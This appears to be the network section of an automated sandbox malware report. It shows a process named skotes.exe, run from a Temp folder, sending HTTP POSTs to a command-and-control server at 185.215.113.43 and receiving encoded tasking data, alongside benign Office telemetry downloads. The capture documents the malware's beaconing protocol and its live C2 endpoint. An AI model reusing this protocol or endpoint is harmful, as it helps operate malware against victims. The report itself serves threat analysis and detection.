                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FHCGHJDBFIIDGDHIJDBG--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:01.746754885 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:01 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    5192.168.2.749996185.215.113.43801796C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:24.451452017 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:25.827512980 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:25 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    6192.168.2.750003185.215.113.43801796C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:27.458527088 CET316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:28.804835081 CET832INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:28 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Data Raw: 32 38 31 0d 0a 20 3c 63 3e 31 30 30 39 35 35 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 34 39 30 37 66 34 38 62 31 62 36 31 32 32 31 34 32 31 66 62 35 61 66 37 64 64 39 66 61 65 65 34 62 64 62 30 63 34 36 38 39 63 34 64 34 33 62 66 35 37 61 62 34 38 34 64 35 65 35 30 39 62 63 38 61 62 34 66 65 62 61 66 38 30 30 37 37 63 62 32 32 39 36 64 62 31 35 65 39 36 38 36 33 38 39 36 36 62 62 66 36 30 66 30 33 39 66 66 31 30 31 34 37 31 65 65 32 64 32 36 37 33 65 64 62 33 30 61 38 34 31 63 39 38 63 61 65 63 34 30 65 66 39 62 32 63 33 35 39 33 35 34 62 62 32 62 66 35 23 31 30 30 39 35 35 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 30 39 35 35 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: 281 <c>1009551001+++b5937c1ad0c0f9c34907f48b1b61221421fb5af7dd9faee4bdb0c4689c4d43bf57ab484d5e509bc8ab4febaf80077cb2296db15e968638966bbf60f039ff101471ee2d2673edb30a841c98caec40ef9b2c359354bb2bf5#1009552001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97e9c4543b31de15441#1009557001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1009558001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1009559001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1009560001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    0192.168.2.74970713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:15 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:15 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:15 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                    Content-Length: 218853
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 25 Nov 2024 13:17:46 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DD0D538D5EA1E0"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f5f75198-101e-00a2-8091-3f9f2e000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080615Z-174f78459685m244hC1EWRgp2c0000000wf0000000006heq
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:15 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:15 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:15 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                                    Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:15 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:15 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:15 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                                                                                    Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:16 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:16 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                                                                                    Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:16 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:16 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    1192.168.2.74971213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC192OUTGET /rules/rule120100v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:18 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1000
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB097AFC9"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6584919e-f01e-0003-06a3-3f4453000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080618Z-174f7845968psccphC1EWRuz9s0000000wz0000000002s7h
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC1000INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 35 22 3e
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH T="5">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    2192.168.2.74970913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC470INHTTP/1.1 200 OK
